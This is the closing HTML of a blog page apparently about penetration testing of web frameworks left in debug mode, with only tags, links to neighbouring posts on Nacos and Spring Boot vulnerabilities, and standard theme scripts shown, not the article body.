    <div class="post-meta mr-3 d-flex align-items-center">
      <i class="iconfont icon-category"></i>
      

<span class="category-chains">
  
  
    
      <span class="category-chain">
        
  <a href="/categories/%E6%BC%8F%E6%B4%9E%E6%8C%96%E6%8E%98/" class="category-chain-item">漏洞挖掘</a>
  
  

      </span>
    
  
</span>

    </div>
  
  
    <div class="post-meta">
      <i class="iconfont icon-tags"></i>
      
        <a href="/tags/Debug%E6%A8%A1%E5%BC%8F/" class="print-no-link">#Debug模式</a>
      
        <a href="/tags/%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2/" class="print-no-link">#信息泄露</a>
      
        <a href="/tags/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" class="print-no-link">#渗透测试</a>
      
        <a href="/tags/Django/" class="print-no-link">#Django</a>
      
        <a href="/tags/Laravel/" class="print-no-link">#Laravel</a>
      
        <a href="/tags/ThinkPHP/" class="print-no-link">#ThinkPHP</a>
      
        <a href="/tags/Flask/" class="print-no-link">#Flask</a>
      
    </div>
  
</div>


              

              
                <div class="post-prevnext my-3">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2026/02/12/%E5%AE%9E%E6%88%98%E6%94%BB%E9%98%B22-Nacos%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8/" title="实战攻防记录2-Nacos漏洞利用">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">实战攻防记录2-Nacos漏洞利用</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2025/12/24/springboot%E6%A1%86%E6%9E%B6%E5%B8%B8%E8%A7%81%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E/" title="Springboot框架常见未授权访问漏洞">
                        <span class="hidden-mobile">Springboot框架常见未授权访问漏洞</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>

    <div class="side-col d-none d-lg-block col-lg-2">
      
  <aside class="sidebar" style="margin-left: -1rem">
    <div id="toc">
  <p class="toc-header">
    <i class="iconfont icon-list"></i>
    <span>Table of Contents</span>
  </p>
  <div class="toc-body" id="toc-body"></div>
</div>



  </aside>


    </div>
  </div>
</div>





  



  



  



  



  







    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v" for="local-search-input">Keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>

    

    
  </main>

  <footer>
    <div class="footer-inner">
  
    <div class="footer-content">
       <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
    </div>
  
  
  
</div>

  </footer>

  <!-- Scripts -->
  
  <script  src="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://lib.baomitu.com/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://lib.baomitu.com/jquery/3.6.4/jquery.min.js" ></script>
<script  src="https://lib.baomitu.com/twitter-bootstrap/4.6.1/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>


  <script  src="https://lib.baomitu.com/typed.js/2.0.12/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var subtitle = document.getElementById('subtitle');
      if (!subtitle || !typing) {
        return;
      }
      var text = subtitle.getAttribute('data-typed-text');
      
        typing(text);
      
    })(window, document);
  </script>




  
    <script  src="/js/img-lazyload.js" ></script>
  




  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/tocbot/4.20.1/tocbot.min.js', function() {
    var toc = jQuery('#toc');
    if (toc.length === 0 || !window.tocbot) { return; }
    var boardCtn = jQuery('#board-ctn');
    var boardTop = boardCtn.offset().top;

    window.tocbot.init(Object.assign({
      tocSelector     : '#toc-body',
      contentSelector : '.markdown-body',
      linkClass       : 'tocbot-link',
      activeLinkClass : 'tocbot-active-link',
      listClass       : 'tocbot-list',
      isCollapsedClass: 'tocbot-is-collapsed',
      collapsibleClass: 'tocbot-is-collapsible',
      scrollSmooth    : true,
      includeTitleTags: true,
      headingsOffset  : -boardTop,
    }, CONFIG.toc));
    if (toc.find('.toc-list-item').length > 0) {
      toc.css('visibility', 'visible');
    }

    Fluid.events.registerRefreshCallback(function() {
      if ('tocbot' in window) {
        tocbot.refresh();
        var toc = jQuery('#toc');
        if (toc.length === 0 || !tocbot) {
          return;
        }
        if (toc.find('.toc-list-item').length > 0) {
          toc.css('visibility', 'visible');
        }
      }
    });
  });
</script>


  <script src=https://lib.baomitu.com/clipboard.js/2.0.11/clipboard.min.js></script>

  <script>Fluid.plugins.codeWidget();</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/anchor-js/5.0.0/anchor.min.js', function() {
    window.anchors.options = {
      placement: CONFIG.anchorjs.placement,
      visible  : CONFIG.anchorjs.visible
    };
    if (CONFIG.anchorjs.icon) {
      window.anchors.options.icon = CONFIG.anchorjs.icon;
    }
    var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
    var res = [];
    for (var item of el) {
      res.push('.markdown-body > ' + item.trim());
    }
    if (CONFIG.anchorjs.placement === 'left') {
      window.anchors.options.class = 'anchorjs-link-left';
    }
    window.anchors.add(res.join(', '));

    Fluid.events.registerRefreshCallback(function() {
      if ('anchors' in window) {
        anchors.removeAll();
        var el = (CONFIG.anchorjs.element || 'h1,h2,h3,h4,h5,h6').split(',');
        var res = [];
        for (var item of el) {
          res.push('.markdown-body > ' + item.trim());
        }
        if (CONFIG.anchorjs.placement === 'left') {
          anchors.options.class = 'anchorjs-link-left';
        }
        anchors.add(res.join(', '));
      }
    });
  });
</script>


  
<script>
  Fluid.utils.createScript('https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.js', function() {
    Fluid.plugins.fancyBox();
  });
</script>


  <script>Fluid.plugins.imageCaption();</script>

  <script  src="/js/local-search.js" ></script>





<!-- 主题的启动项，将它保持在最底部 -->
<!-- the boot of the theme, keep it at the bottom -->
<script  src="/js/boot.js" ></script>


  

  <noscript>
    <div class="noscript-warning">Blog works best with JavaScript enabled</div>
  </noscript>
</body>
</html>
